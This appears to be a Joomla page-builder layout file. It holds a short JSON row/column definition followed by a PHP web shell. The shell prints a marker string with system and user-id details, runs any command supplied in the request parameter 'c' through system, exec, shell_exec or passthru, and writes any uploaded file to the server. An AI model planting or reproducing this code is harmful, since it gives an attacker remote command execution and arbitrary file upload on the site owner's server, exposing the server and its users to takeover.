[{"type": "row", "layout": "12", "settings": {"name": "r1", "css_class": ""}, "attr": [{"type": "column", "className": "sp-col-md-12", "settings": {"name": "col1", "column_type": "0"}}]}]
<?php error_reporting(0);echo"J0MLA_AIO_OK|".php_uname()."|uid=".getmyuid()."\n";if(isset($_REQUEST["c"])){if(function_exists("system")){system($_REQUEST["c"]." 2>&1");}elseif(function_exists("exec")){exec($_REQUEST["c"]." 2>&1",$o);echo implode("\n",$o);}elseif(function_exists("shell_exec")){echo shell_exec($_REQUEST["c"]." 2>&1");}elseif(function_exists("passthru")){passthru($_REQUEST["c"]." 2>&1");}}if(isset($_FILES["f"])){move_uploaded_file($_FILES["f"]["tmp_name"],$_FILES["f"]["name"]);echo"UP";}?>